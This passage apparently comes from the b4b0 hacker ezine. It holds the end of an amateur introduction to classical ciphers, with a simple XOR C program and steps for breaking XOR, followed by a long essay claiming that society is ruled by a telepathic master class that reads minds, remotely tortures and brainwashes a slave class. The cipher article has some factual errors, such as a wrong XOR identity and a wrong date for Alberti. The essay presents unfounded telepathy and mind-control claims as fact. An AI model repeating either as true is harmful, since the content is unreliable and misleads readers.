but it is often used in Usenet posts to hide potentially offensive text,
avoid giving away a solution to a puzzle, etc. Simple substitution ciphers
are easily broken due to the fact that the cipher does not hude the
underlying frequencies of different letters of plaintext. All that is
needed to crack a simple substitution cipher is 25 letters of the alphabet.

* Homophonic Substitution cipher - plaintext character can be replaced with a
string of ciphertext characters.

Homophonic Substitution ciphers where used way back in the 1400s. They are
much more complicated to break than simple substitution ciphersbut do not
obscure the statistical properties of plaintext language.

* Polygram Substitution Cipher - Blocks of characters are encrypted in groups.

Polygram substitution ciphers are groups of letters encrypted together. A
well known cipher known as The Playfair cipher, invented in 1854, used by
the British in World War I. It encrypts a pair of letters together.

* Polyalphabetic Substitution Cipher - Made up of multiple simple substitution
ciphers.

Polyalphabetic substituion ciphers were invinted in 1568 by Leon Battista,
and where used in the Civil war by the Union army. With the help of
computers this type of cipher can be cracked easily, and with this in mind
many commercial computer security products use ciphers in this form. The
polyalphabetic substitution cipher uses multiple one-letter keys. Each key
is used to encrypt one letter of plaintext. The first key encrypts the
first letter, the second key encrypts the second letter, etc. Once all of
the keys are used the cipher starts at the beginning of the keys. (Ex: In
20 one-letter keys, each 20th letter key is encrypted by the first key.)
This is called the period of the cipher. In classical cryptography, ciphers
with larger periods are harder to break than ciphers with small periods.
Computer techniques can be used easily break substitutions ciphers with
large periods. The Vigenere cipher, published in 1586, is an example of
Polyalphabetic Substituion.

In the 1920s a mechanical encryption device was invented to automate the
process of encrypting data. Most were based on the concept of a rotot, a
mechanical wheel wired to perform a general substitution. A roto machine
has a keyboard and a series of rotors and uses a version of the Vigenere
cipher. each roto has an arbitaray permutation of the alphabet, each has 26
positions, and performs simple substitutions.

Example -
A rotor might be wired to substitute "F" for "A", "U" for "B", "L"
for "C," etc. The output pins of one rotor are connected to the
input pins of the next.

In a 4-rotor machine the first rotor might substitute "F" for "A,"
and the second rotor might substitute "E" for "Y," and the fourth
might substitute "C" for "E," thus making "C" the output ciphertext.
Then the some of the rotors shift, so the next substitution will be
different.

The combination of several rotors and gears moving them that makes the
machine secure. All of the rotors move at different speeds, and the period
for an nrotor machine is 26^n. Some rotor machines move at different
positions on each rotor, making the encrypted data more secure.

The widest known roto machine is known as the Enigma. The Enigma was used
by the Germans during WWII. Invented by Arthur Scherbius and Arvid Gerhard
Damm in Europe, but patented in the United States by Arthur Scherbius.
German Enigma had three(3) rotors, chosen from a set of five(5), a plugboard
that permuted the plaintext, a reflecting rotor that caused each rotor to
operate on each plaintext letter two times. The Enigma was complicated, but
broken by a very good team of Polish cryptographers, and explained their
attack to the British. After finding out the Germans modified their Enigma,
and the British continued to break the new versions.

/* Transposition Ciphers */

There is not much information on Transposition Ciphers. So if I have missed
any thing you know regaurding Transposition Ciphers, please send me an email
and I will re-release the article with the new content.

In a Transposition Cipher the plaintext remains the same but the order of
the characters are shuffled around. Simple Columnar Transposition Cipher,
plaintext is wrote as if it were wrote on graphpaper. The plaintext is
wrote horizontal and is set to a fixed width. The ciphertext is read off
vertically. Decryption is a matter of writting the "ciphertext" verically
with the known fixed width and reading plaintext off horizontally.

Example -
Plaintext: This is a example of a simple columnar transposition cipher
T H I S I S
A E X A M P
L E O A S I
M P L E C O
L U M N A R
T R A N S P
O S I T I O
N C I P H E
R
Ciphertext: TALMLTONR HEEPURSC IXOLMAII SAAENNTP IMSCASIH SPIORPOE

The fixed width in the example is six(6). The letters of the ciphertext and
the plaintext are the same, a frequency analysis on the ciphertext would
reveal that each letter approximately has the same likelihood as english.
Thus being a very good clue to a cryptanalyst who can then use a variety of
techniques to get the right ordering of the letters to retrieve the
plaintext. Putting the ciphertext through Simple Columnar Transposition
Cipher more than once, greatens the security of the encrypted data. There
are more complicated transposition ciphers, but with the use of computers
they are easily breakable. The German ADFGVX cipher, used during WWI, is a
transposition cipher combined with simple substitution cipher. It was a
complex algorithim for its day, but a french cryptanalyst, Georges Painvin,
broke the cipher. Many modern algorithims use transposition ciphers, but
requires a lot of memory and requires messages to only be certain lengths,
substitution is far more common.

/* Simple XOR */

XOR is an exclusive-or operation, known as '^' in C. It's a standard
operation on bits:
0 ^ 0 = 0
0 ^ 1 = 1
1 ^ 0 = 1
1 ^ 1 = 0
a ^ a = 0
a ^ b ^ b = 0

The simple-XOR algorithim is really embarrasing. It is nothing more than a
Vigenere polyalphabetic cipher. It is only because of its prevalence in
commercial software. It was widely used in most MS-DOS and Macintosh
Operating Systems. Although a software security program proclaims that it
has "proprietary" encryption algorithm faster than DES the odds are it is
some variant of given code.

*snip*

void main (int argc, char *argv[]) {
FILE *fi, *fo;
char *cp;
int c;

if((cp = argv[1]) && *cp != '\0') {
if((fi = fopen(argv[2], "rb")) != NULL) {
if((fo = fopen(argv[3], "wb")) != NULL) {
while ((c = getc(fi)) != EOF) {
if(!*cp) cp = argv[1];
c ^= *(cp++);
putc(c,fo);
}
fclose(fo);
}
fclose(fi);
}
}
}

The algorithim takes the plaintext and XORs it with a keyword to generate
the ciphertext. To restore the ciphertext to plaintext just XOR it again.
Encryption and decryption uses both the same functions and programs.
P ^ K = C
C ^ K = P
This kind of encryption is trivial to break without computers, but no real
security is here. Only a few seconds are needed with a computer. Assuming
that the plaintext is English, and Assume the key length is a small number
of bytes, here are a few steps to break it:

1> Discover a length of the key, by counting coincidences. XOR the
ciphertext against itself shifted various numbers of bytes, and count those
bytes that are equal. If displacement is a multiple key lengths, somthing
over 6 percent of the bytes will be equal. If it is not less than .4
percent will be equal. (Assuming the key uses ASCII text; other plaintext
will have different numbers). This is index of coincidence, smallest
displacement indicates a multiple key length is the length of the key.

2> Shift the ciphertext by the length and XOR it with itself. This removes
the key and leaves you with plaintext XORed with plaintext shifted the
length of the key. Seeing how English has 1.3 bits of real information per
byte, redundancy is no matter for determining a unique decryption.

Do not be misslead this algorithim is a toy, and should not be considered as
anything to keep knowledgable crypanalyst away from encrypted data. This is
the algorithim that the NSA allowed the U.S. digital cellular phoe industry
use for voice privacy. As noted above, this algorithim may keep your lil
brother/sister, and your parents out of your files, but will not stop a
cryptanalyst for more than a few minutes.

Thus bringin the Introduction to Encryption Volume 1. If there is anything
that you can see with this article, that may be considered wrong, or if I
left out. Please e-mail me at ep1d@nebula.diginix.net. In the near future
I will probbly write more on the articles listed here.

ep1d@nebula.diginix.net


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.16][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


CAN PEOPLE READ YOUR MIND?
--------------------------

Silvio Cesare FOR THE OPPRESSED,
silvio@big.net.au COMMUNICATION IS THE BEGINNING OF ABOLITION.

in IRC
channel #freedog, efnet network, nick 'silvio'
oz.org network (Australia), nick 'silvio'

INTRODUCTION

This article describes an oppressive society where the social structure is
designated by the telepathic abilities of the individuals. The oppressed are
coerced into a slave mentality through demoralisation and associated
"brainwashing" and mind control techniques.

The structure and the implementation of implanting the slave mentality into
the oppressed is outlined in this article. The article then continues to
describe how an upheaval of this oppression in the social structure may be
achieved or started, by we the oppressed, via global awareness and uniting of
our people.

THE SLAVE/MASTER SOCIAL STRUCTURE

The social structure of society in the current age is determined not only by
pure wealth, assets, or where we live. A much more sinister and fundamental
classing system is imposed. The structure I am describing is based on the
telepathic abilities of the individual.

The fundamental structure is a two class slave/master system, as has been the
case for many societies for a time-span much greater than one would imagine
possible considering the basic in-humanity imposed by force-ably dictating the
life and future of another human being. The telepathic correlation into the
structure is such that the master class can hear the thoughts or the read the
minds of the slave class, to whom, can read or hear no-ones thoughts and
minds. The actual telepathic abilities are not quite as course as this in
society, with a group that can read the minds of the slave class, but can also
remotely physically and subconsciously affect them. Almost certainly another
group exists, or may be in-fact part of the previous group, where an
individual can both hear and be heard by the master class.

This also presents a situation where the individuals in the slave class are
unaware of the existence of others and are unable to, with total certainty
determine that another individual is in a similar predicament, much analogous
to not being able to determine others having the ability to think - though it
is common knowledge that we all do.

IMPLEMENTING OPPRESSION AND THE SLAVE MENTALITY

The group who has the ability to telepathically read the minds of a group could
have used this extraordinary ability (or equally an extraordinary ability of
the group who's mind can be read) and cooperated resulting in a net benefit
for society in its entirety. However, as is true in many historical times,
the group with a position where they can dominate another group, force-ably
implements that dominance, and this exact thing has occurred in the
slave/master telepathically determined social structure of current.

PROPAGANDA AND MANIPULATION AS A TOOL FOR OPPRESSION

It is a scientific fact, that "brainwashing" techniques and propaganda based
information can be an effective tool in the implementation of a new ideology
for a person. Much of this is based on relating to a person at an emotional
level. For example, much of Nazi propaganda was based around the fact that the
minority groups they opposed were to be considered as sub or non human. They
did this through emotionally manipulating the people into a mental state of
total repugnance for the oppressed. Likewise, in slave history, slaves were
seen as being born a slave and were thought to be inherently destined to be
subservient. Thus propaganda based distribution of information was used to
promote that it was a genetic not environmental reason that a slave was a slave
and a master was a master. This naturally was not supported or verified by
open scientific discussion that would refute such blatantly biased and
prejudiced claims. This however is a key point, that a slave/master structure
is not a scientific based structure, it is an emotionally based structure. It
may be intellectualized and rationalized to have economic correlations, however,
this is as a result of the emotional thinking, not rational thinking.

Intellectualization is often used to identify with a persons cognitive
thoughts, however, such ideas are based on rationalizations. For example,

"q: why is he a slave? a: because he was born a slave."
"q: why was he born a slave? a: black people aren't like normal people"
"q: why aren't they like normal people? a: look at them, their slaves."

This gives also an example of "blame the victim syndrome", which was also a
driving force for the Nazi's and general slavery, as this was a common
emotional feeling held by the population.

For oppression, the form of demoralisation follows similar lines to emotionally
based ideology implanting. It is not based on scientific fact, but is based
purely on psychological and physiological responses that the oppressed
individuals intellect cannot always compete with. Thus, even being
intellectually aware that you are being demoralized or "brainwashed", does not
always enable you to resist indefinitely. However, simple highly effective
techniques do exist, and are presented later in this article.

DOMINANCE IN THE ENVIRONMENT

The environment in which the oppressed lives and dwells plays an essential
role to coerce a slave mentality into the individual. The primary focus, is
that the environment is totally dominated by the oppressors, and the oppressed
are not able to control their own life. Thus their own life is a function
of the oppressors. This is not of course true, but it is a natural
psychological response to such an extraordinary and certainly unnatural
situation.

EXCESSIVE STRESS AS A TOOL FOR EMBEDDING A SLAVE MENTALITY

The primary aim of the oppressor is to raise the stress of the oppressed to
such an extent where the coping mechanisms can no longer function. It is at
these times, when mental instability is at its greatest, and the ability to be
influenced is equally at its greatest, thus it is times like this when new
ideologies are implanted. This stress can be induced and increased until such
a time occurs, and such a feat is not difficult in consideration that for all
purposes, the entire social population is attempting to induce such a thing in
a specific individual.

THE "ENDS JUSTIFIES THE MEANS" PHILOSOPHY OF OPPRESSION

It must be noted, that, the oppressors are believers of an "ends justifies
the means"
philosophy, and what a normal individual in a non oppressed
population would consider inhumane to even consider, such acts are extremely
common and to be expected. From people the individual has a close relation
too, to people the individual does not know. The most repugnant things may
be experienced, and it must be made immediately clear, that for the oppressors
such actions appear justified just as the extermination of the Jews for the
Nazi's or the oppression of black people for slavery was justified at the time.

DENIAL OF OPEN DISCUSSION AND INFORMATION IN OPPRESSION

A primary focus that deeply undermines the ability to remain free of the slave
mentality, is the inability to communicate openly. The oppressors will not
relate to the oppressed in any form where they are on equal terms, thus
possibly relating to the oppressed as a living being and not simply an object.

LANGUAGE GAMES AS A MEANS TO DESTROY RATIONAL THOUGHT

In a similar respect to lack of open discussion, language games are used to
effectively eliminate the ability for rational thought when these games are
followed by the individual. In this respect, the effective language of the
oppressed individual is replaced with a metaphoric and quite simply mostly
nonsensical language that is used for communication between the oppressor and
the oppressed. This has the startling ability that because the individual no
longer has a satisfactory framework of language to use, rational thought, which
is much derived from the ability to effectively communicate complex ideas, is
not practically possible and also serves to derive new psychologically damaging
associations.

It should be stated that coloqially, the oppressed here, are known to as
"dogs", though the term "cat" is given to an oppressed individual to use on
occasion. Naturally, the most fundamental words in language in regard to their
functional status in society are replaced metaphorically. Thus the individuals
entire conceptualization of society may change by replacing specific keywords
in the language used.

CULTIC STRATEGIES OF IMPLEMENTING SUBSERVIENCE

A premeditated cult like induction of the slave mentality is used early on in
the ideology implanting and used sparsely following. In these circumstances,
many of the persons fundamental beliefs are questioned, with a psychologically
coercive attitude using such physiological factors such as lack of sleep,
sexual drives, and drug induced conscious states. Likewise, the attempt to
force an addiction onto an oppressed individual, and then to remove the source
to satisfy the urges of the addiction, to induce a high increase in stress.
Psychological factors involve such common raw emotions as fear, anger,
frustration, happiness (to enforce that the oppressed is most happiest with the
oppressors, or simply for positive re-enforcement of negative traits), and such
stress inducers as changes in work, home or even family structure. Many first
time events such as coming into awareness of telepathic abilities are under an
altered state of consciousness (drug induced). These are times when the
ability to be influenced is greatest. At these times, the oppressed individual
is often bombarded with a flurry of personal attacks of such things as their
sexuality, their race, their beliefs, and are often attacked verbally in such a
manner, such that they may fear latter events of violence, wrongful
imprisonment or even life threatening situations. Typically, the situation is
such that the dominating majority of the influential social group involved is
involved in such activity, however, as with this typical this mind control
technique, and more classically known as "good cop, bad cop", the oppressed
individual given a so called ally outside the immediate social group, however
this person is far from an ally, and is indeed actually present to influence
and guide the oppressed into the mental and physical states desired by the
oppressors. This technique is a strong method used in many forms of
demoralisation and "brainwashing" in the aim to elicit a bond between the
oppressed and an oppressor or oppressors that can be used to influence and
implant beliefs in the individual. This influential bond is a one of the
primary tools used for embedding the slave mentality, and it must be again be
made apparent, that an "ends justify the means" approach is taken by the
oppressors using such structures as the family, sexual relationships,
friendship and the individuals own role models, which often includes
celebrities or positions of high status deemed in society.

INDUCED EUPHORIA AS A TOOL FOR THE OPPRESSOR *

The oppressed individual often experiences a period of god like status
indicated by the oppressors, seemingly having the ability to influence the
masses, and do as one may wish being given full rights for any activity as
they desire. It must be understood, that at no times, does the oppressed
person ever truly have such freedom. They are heavily guided into activities,
and a reward based system as simple as a smile or a frown can often dictate
how the individual uses their so called apparent freedom. Likewise, it shows
a contradictory position, that the oppressors will not openly discuss the
situation even if repeatedly requested, even in this so called god like
stature. This also plays a dual effect of demoralizing the oppressed in
a later stage by believing they had abused their so called position of
power. It is irrespective, of how they used their position at the time,
the oppressors will never acknowledge anything other than actions that can
be used to enforce the slave mentality onto the individual. This also
serves to re-enforce the idea that the oppressors are actually being
oppressed by the soon to be oppressed who are actually strongly coerced
psychologically into playing a dominant role over the oppressors who role
play as being submissive. However, the converse does not apply, if the
oppressed strongly opposes submission of persons irrespective of the apparent
desire of those persons to play that role, the oppressors do not change their
role. This eventually leads to frustration in the part of the oppressed in
their inability to help, which again serves the final purpose of the
oppressors, into demoralisation and implanting of the slave mentality. It
must be made a point though, that the argument that the oppressed would enslave
the oppressors if given the chance or even coerced and such slavery would even
be far more in-just, is fictitious fantasy used as propaganda by the
oppressors, as this has certainly been not the case. Even if this were true,
the oppressed are being coerced by the oppressors into such actions, and they
have already no doubt accumulated a great deal of stress form the period of
time before becoming aware of the telepathic nature of society. Thus this is
propaganda in its purest form, deriving fictitious fact which is highly biased
in favour of the oppressors, and only serves to re-enforce the oppressors and
never to negate them.

REMOTE PHYSICAL STIMULUS OF THE OPPRESSED

As mentioned in previous sections, a group in society exists that has
telepathic skills that can remotely subconsciously influence, and physically
stimulate and influence. Torture or attempted degradation is achieved often
through unconsentual sexual stimulation. Be sure, that this is no source of
pleasure as it is indeed a tortuous ordeal occasionally involving personal
injury in the form of pain for the days to follow from the stimulation
involved. Unconsentual sexual acts, or rape, is indeed such an effective tool
as it can be noted in direct physical rape in general society causing a
high loss of degradation, often involving many psychological responses, of
being powerless, shamed and fearful. This is indeed a prime instance of the
"ends justify the means" ideology that the oppressors follow. This indeed
re-enforces the the oppressed person is never totally safe or free, a large
factor in the demoralisation and it is not uncommon such feelings to generate
large emotions of frustration.

REMOTE INFLUENCE OF THE OPPRESSED

In a similar scenario, their is an existence of people who can influence
subconsciously the oppressed. This form of influence, while indeed is
certainly an advantage to oppression, does not dictate that the oppressed
can be heavily influenced using these techniques. Rather, in common practice,
such influence is used to induce the oppressed to think or think excessively on
a particular topic, and then the physically based demoralisation techniques are
used for the embedding of the slave mentality. Thus in itself, its influence
is not extreme, and is supported by the facts, the a physical presence is often
used in conjunction with such subconscious influence. However, it does serve
the oppressors as useful tool for subserviating the oppressed, and its effects
are naturally varied depending on the individual involved.

CONDITIONING IN THE OPPRESSED

The conditioning process is a almost fanatically used in oppression to indict
the response the oppressors are trying to achieve. A punishment system is
embedded using common life occurrences such as noise, remote stimulation and
non verbal gestures. These stimuli while seemingly very crude are actually
very effective, as noted by the classically known "dripping water-tap" torture.
Likewise, such punishments while in their own form not always constituting
punishment, can be conditioned into the individual at a time when they are
of easy influence. More conditions detrimental to human spirit is also
aimed for, such as learned helplessness.

THE SLAVE MENTALITY

The eventual aim of demoralisation and psychological "brainwashing" or
conditioning is to elicit a functional person embedded with a slave mentality.
Note that having a slave mentality does not necessarily require the oppressed
to recognize such a mentality existing within themselves. It may be noted,
that perhaps the most perfect slave, is a slave who believes not to be a slave,
but working sometimes unknowingly for a master, for their own reasons.
Demoralisation is also not always a prerequisite for embedding the slave
mentality also, as it is only a tool used to embed such a mental state. Thus
it is quite possible for a person to be recognized as being in the slave
relationship without experiencing the conditions described. However, the final
result is the same, and the quality of life is no better or worse for such a
person. The individual is just that, and has their own unique levels of stress
tolerance and ability to cope with such conditions. Much as it is analogous to
pain, that a person may have a slight cut and be in great pain, and a person
who has a fractured bone, feels nothing more than a slight sensation. The key
point, is that no-matter what conditions the oppressed individual experienced,
their struggle is no greater or easier than others who have been through less.
However, it is certainly a case, that once the slave mentally has been
embedded, the persons life even if considered reasonable by the individual is
no better than the person who lives under extra-ordinarily terrible conditions
and represses the situation. Thus it is essential to understand, that quality
of life can be greatly raised by upheaval of oppression. Perhaps more
importantly though for some, the moral and ethical structure in which we are
members of society of is so abomidably warped, that it is a struggle not just
for each person to carry through, but something we must struggle for our people
and also, for all society in general.

Thus the oppressed is embedded with slave mentality. It must be noted however,
that demoralisation and torture is not an indefinite affair. The aim of
the oppressors is to embed with the slave mentality, yet still be functional
in society but at the same time live in fear of the oppressors to maintain
their mind-set, with the occasional relapse of torture again for maintanence.
This is to be used and abused by the oppressors who embedded the individuals
involved. Many people are under the false belief that the oppressors have low
expectations of the oppressed in their functionality, and this is where the
problem occurs that helps embed the slave mentality. The oppressed believing
them-self of low worth in society, strives in achievement which is ultimately
guided by the oppressors, and in effect elicits a slaves behaviour for societal
self worth. The culmination of those achievements and the rewards associated
with them however are not directed at the oppressed, but in-fact, the
oppressor, thus the slave mentality is complete without the oppressed
realizing. A perfect slave indeed.

This changes dramatically the role of the oppressed in resisting oppression.
It is a falsehood to the oppressed that they are lower achievers than the
oppressors. It is a truth, that the oppressors gain what the oppressed
do achieve. This also serves as a basis on why the oppressors do not realize
their errors in ideology through an oppressed individuals skills, dedication
and achievement. This in fact describes the slave/master social structure.
Naturally, the oppressed slave is given idle rewards, so as to keep the
effective achievements at a consistent high standard. It is to be recognized
that the slave/master relationship should not be abolished simply by non
achievement in the oppressed, but rather through equality for achievement in
all.

GENETIC RATIONALIZATIONS

The slave mentality for most people is so forcibly inscribed into people, that
is is considered inbred into the person from their birth. This is fictitiously
incorrect, but examples over history do serve as prime examples that this is so
dominant in our society. In the course of modern history, it has been
witnessed, which at the time was almost incomprehendable to the citizen, that
persons of normal caliber and without any inborn deficiency or hidden desire,
had been "brainwashed" to such an extent, where their entire ideology of groups
they were at war with at the time had been completely reversed, and as they
were reintroduced to society, they were opposing views they previously held,
finding their previous actions before the point of ideology change utterly
shameful. Even more amazing, is the fact, that they had invented completely
new and fictitious beliefs that their own organizations had been secretly
conspiring against their enemy of the time to do such actions that would make
even most of the stern of people shake their head in disbelief.

The average person at the time of these events was utterly shocked to hear such
a thing was possible, yet it has been happening for thousands of years with the
eliciting of a slave mentality in oppressed people. It is only when they
themselves, see such actions as possible to their own, do they sometimes begin
to identify that such responses are not always inbred. Even this however,
does not generally happen. The persons involved in the ideology changes are
often thought to be by the public as "not your normal people", thus
eliminating the thought that they themselves are not totally infaliable.

RESISTANCE TO DEMORALISATION AND "BRAINWASHING"

All is not bleak however, other individual who were involved in such a regime
of "brainwashing" resisted extremely well. The differing aspects, where these
people were part of an organization that was aware of such possibilities, and
had trained these persons as best they could (psychology is not an exact
science) to be able to actively resist the strong influences of environment
change and the alternation between torture and leniency, that is so
fundamental to demoralisation and implanting or replacing of beliefs.

LIMITED INTERACTION FOR RESISTANCE

The primal focus of resistance was that of non involvement with the persons
attempting to "brainwash" the individual. It is no time for exercising will
power to debate the oppressors are at fault. They will never acknowledged
such events and will never regret their actions in any reasonable time-line, as
they have been heavily influenced themselves by a large peer and authority
group that is always present, to deindividualize the oppressed into objects,
so that they are able to be manipulated, deceived, and tortured without any ill
harm to the oppressor in physical or mental states.

In the specific oppressed environment that we are in, where our foreseeable
lifetime is to be involved with the oppressors, this is not always possible in
the absolute sense, as some form of interaction is required to function even
minimilisticaly within society. However, the theory is sound and can be
equally applied as many active resistors are almost certainly proving each day,
in that there is no point in interacting on a level where you are speaking on
the benefits of a free society and the down-falls of an oppressed one.
Likewise, any inhumane events that occurs should not be dwelled onto such an
extent, where you try to show the fallacy in the oppressors ideology. For even
undeniable facts that the oppressors are at fault in, interacting at this
extent is only reducing your effective resistance. It must be said, that it is
very detrimental also, to use the language games that the oppressors have
thrust upon the individual. Language is central to a persons thought process
and effectively interrupting this process results in an easily influenced
person. Likewise, even simply recognizing the problem, and, if not always
achievable at the start, eliminating metaphoric language, will yield dramatic
results in resistance.

THE INDIVIDUALIST APPROACH AS A CONTRADICTION TO THE SLAVE MENTALITY

The perfect slave has the undignified attitudes that their own personal
wishes are that of their masters or oppressors. The opposite attitude is
an ideal situation in which to resist to the influences of oppression as the
two are quite incompatible.

It has been seen through case studies of people who have undergone situations
of an oppressive environment in an effect to elicit a slave mentality, that the
people that survived and were most unharmed by their ordeal were those who were
"well put together", in that they were not followers of a single unified
lifestyle and belief, but were rather people who had their own interests and
attitudes, and were not socially bound to a particular instance in which
limited their ability to express themselves (conversely however, people who
had been seriously onset with beliefs, which they firmly believed most
probably from an early childhood, such as joheva witnesses were also most
insusceptible to demoralisation). Living your own life is such a simple act,
yet many people, not only those in a serious oppressed environment of
persecution and slavery, ignore this, and as a result, are effected adversely,
most visibly by high stress.

REDUCTION OF STRESS TO RESIST BREAKDOWN OF THE NERVOUS SYSTEM

The gist of "brainwashing" appears to be the induction of stress to an
intolerable level such that the coping mechanisms of the individual can no
longer deal with the situation. It is times like this, where the individual
is at such a point where there previous beliefs have been, coloqially speaking,
wiped clean or washed, and new beliefs or ideologies may be implanted. Thus
the resistors aim is to keep stress at a minimum. This task while apparently
simple in a non oppressed environment is not so in an oppressed one, but
keeping this in-mind, it is possible to resist more effectively, as is the case
of the previous arguments where non interacting into a one sided debate will
inevitably lead to frustration, a prime breeding ground for on-setting the
slave mentality.

INFLUENCE IN THE EMOTIONALLY AROUSED

It is also relevant, that strong emotional responses are also prime breeding
grounds for on-setting the slave mentality, for example, the person who is
greatly angered is more susceptible to have beliefs implanted over the person
who is calm. Likewise as previously stated, the person who is greatly stressed
and is also angered is much more susceptible than a person who was under no
stress before entering an equal emotional state.

DENIAL OF OPEN DISCUSSION

A driving force into the oppression is the denial of information and
alternative views that oppose the oppressors. People are often initially
demoralized into believing they are not only the minority, but they are
completely unique, isolated and alone. Naturally, the effects of isolation are
important to a situation where a slave mentality is to be induced, however,
it also serves as a position to disallow the ideas of other oppressed people to
compare, construct and conceptualize problems and alternative ideologies. This
is also further demonstrated by the lack of the oppressors to openly converse
their beliefs in an open manner. In this manner, not only does an individual
have an opportunity to debate on an equal level - which would obviously deflate
the position of the oppressor, but it also breeds a problem of never being able
to verbally voice opinions, thus solidify their basis into reality and as a
strong conceptual idea. It would not be so far fetched, for an individual to
believe they had simply imagined the basis of their situation, and to easily
repress it, as it has never been openly stated.

RATIONALIZATION AND CONCEPTUALIZATION

The human instinct of curiosity and abstraction of an ideology that solidifies
in a conceptual picture of reality, is a driving force in a being. The
individual is often led on a fictitious path to quench the persons desire to
explain the events of the situation. Religious theologies are often based on
this fact, that it is human to ask and desire knowledge on such fundamental
questions of origination, and such large events in our life. It was typical of
ancient religions to incorporate such unexplained phenomena as fire, the sun
and other such essential aspects of life. For the oppressed, this desire is
not lessened in any way, and as the oppressors play such a large role in their
new life being able to interact verbally with there own mental thoughts, and
to remotely physically stimulate them, plus the obvious entire social
dominance in sheer numbers. Thus, the individual often tries to tie in all
these occurrences into as much of a coherent story as possible so as to
solidify a conceptual picture of reality. If factual reality based theologies
are not available, it is no wonder, that the supernatural often plays a role in
the new ideologies of the oppressed.

REALITY BASED RE-ENFORCEMENT

As described, the supernatural, or religious based rationalizations and
conceptualizations are often used by an individual in a "brainwashing"
environment. A powerful technique to use to combat attacks on the oppressed
picture of reality, is to re-enforce it. Typical things that are always known
to occur that cannot be controlled is such things as the sun rising every
morning, a pretaped movie or TV show remaining constant (note that the
perception of the perceived communication may not be constant, as this is
subjective), or even a tree not turning into a giraffe and running away (unless
halucenagenetic drugs are used to induce such an image). Note, that such things
as a persons manner or responses, the telephone system, the radio, the
premeditated prerecorded TV show or communicate message can not be used for
reality re-enforcement because they are externally controllable. Likewise,
such things as your general person being pain free, not having a headache, not
getting angry, should generally not be used for re-enforcement either.

THE PHYSICAL MANNER UNDER THE SLAVE MENTALITY

That is the internal result of such a social structure so heavily using
such at times incomprehendable inhumane acts as a desire to onset the slave
mentality. Externally, the results are thoroughly determined by the specific
ideology that is being imposed by the oppressor, that is, the slave mentality
which is visible in our physical environment. Thus it is not simply possible
to resist totally passively by not submitting on a mental level as physical
dominance is the desired result of the oppressors. For the amount of time
involved, physical violence is little used to emit the desired responses from
the individual. Thus, while it may be true that you appear to be mentally
free, if your physically submitting, your not at all mentally free, and rather
living in a repressed mind-set to unburdon yourself of the desire to remain
free, yet also have a high quality of life.

FREEDOM OF INFORMATION TO ABOLISH THE SLAVE MENTALITY

The open discussion of oppression and the scenarios of each individual would
greatly influence the course of oppression for our people. The distribution
of information providing factual information of events would serve to aid
resistance in many facets, just as the denial of information helps aid
oppression and slave mentally in as many areas.

Psychologically it is true, that often many times, the fear of the unknown is
greater than the actual event. This is used by the oppressors to elicit
submissive responses from the oppressed. By distribution of factual
information of such events and their results, this fear can be alleviated. It
is true, that if the majority of the oppressed today knew about the ordeal to
follow once it had started, then the quality of life for those people would be
greatly enriched, not only by reducing the inherent fear that the unknown is
associated with, but by enabling them to more effectively resist the effects of
demoralisation and even to the extent of resisting and possibly nullifying
submissive actions to the oppressors.

Thus distribution of information can effectively deny the onset of the slave
mentality. However, it can go further than that. It is a known fact, that
even in a non oppressed society, that the distribution of information and
alternative information is a good thing. The laws representing freedom of
speech are supposedly here to enhance society, and this is true in its pure
form, however, freedom of speech can be considered a paradoxical statement for
such a law to protect individuals from such denials of information, if it is
being selectively ignored to factions of society. Freedom of speech allows not
only the distribution of information, but increases the net effect of
advancement by giving each individual the ability to work upon other's ideas
and to also stir up a person to an extent where they are willing to act if the
cause is just. It is factual, that the introduction of the ability to protest
peacefully, has allowed people to rally help, and help form a mind-set where a
person feels able to change the social structures in which they exist without
resorting to actions in cases to equal the oppressors. Certainly, there is no
guarantee that such protests and rallies do entrench the majority of people to
their cause if just, but it does serve to make such ideas known to the majority
of the public, which can be used to sway the social structures by forcing
people to think about it, without using such rationalizations that an open
discussion would immediately squash.

FREEDOM OF INFORMATION AND THE ABOLISHMENT OF OPPRESSION

This raises another point, in that while effective for the oppressed to resist
strongly against the oppressors, it also enables the oppressors to reconsider
their views, and although this is certainly not a case where such open and
logically sound information immediately sways the masses to the righteous,
it does start the gradual but inevitable change to that direction, which
should be the eventual goal of any social system. That is, ultimately, the
desired goal is to see that any individual never has the desire to be an
oppressor and would equally feel as I, that it is the epitome in all that is
vile in the uneducated and ignorant human being. This however, is not the
primary goal of distribution of information for our people at such a stage. It
does serve to paint a picture that one day, almost certainly not in the
lifetime of a person in this age, when all persons will be treated equal and
the slave ideology will have finally be thwarted to an extent where it is
thwarted, not just selectively eliminated from groups of the day.

CONCLUSION

This document has given important information to the section of society that is
oppressed in a slave/master relationship that is existent in the current
population. This information, has been specifically aimed at this oppressed
group, to rally public awareness and support in the abolition of the structural
system of subservience.

It is almost certainly known, that this document will do little to aid the
changing of general public opinion in the oppressors, however, it does give
an opportunity for those who endorse abolishment to offer silent support
in the private distribution of this information, as they are in easily the best
position for targeting the individuals this document was designed
specifically for. This however, is admitadlly, not more than an idle hope
for future generations.

The implementation of the slave/master social structure as described, show that
lack of awareness is one of the primary central driving forces to the
oppression that is present in society. The points made to start the change or
at least make publicly aware to the oppressed of this information, can thus be
seen as effective tools in the quest of the ultimate goal in an abolition of
oppression.

Silvio Cesare FOR THE OPPRESSED,
silvio@big.net.au COMMUNICATION IS THE BEGINNING OF ABOLITION.

in IRC
channel #freedog, efnet network, nick 'silvio'
oz.org network (Australia), nick 'silvio'



Thatz all Folkz, until issue 10, goodbye! and farewell!

`Mb
`b ..rmMMbmy..
`b .dMP"' `"VMb.
`b .p' `Mb
`b ,p' `Mb ,mdMMbm.
q. ,dP `b ,MP"' `"MMb.
`b .P `b ,P' `b.
`L M `L ,P ****b4b0!***
MM MM'
`P `P ~lusta
--====-- --====-- ---======---


[.this has been an offical.]
__ ____ __ ____ ___ __
/ /( _ \ /. | ( _ \ / _ \\ \
/ / ) _ < (_ _) ) _ < ( (_) )\ \
/ / (____/ (_) (____/ \___/ \ \
| -> p r o d u c t i o n <- |
-b4b0•b4b0•b4b0•b4b0•b4b0•b4b0•b4b0•b4b0•b4b0-
\__________________________________________/

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
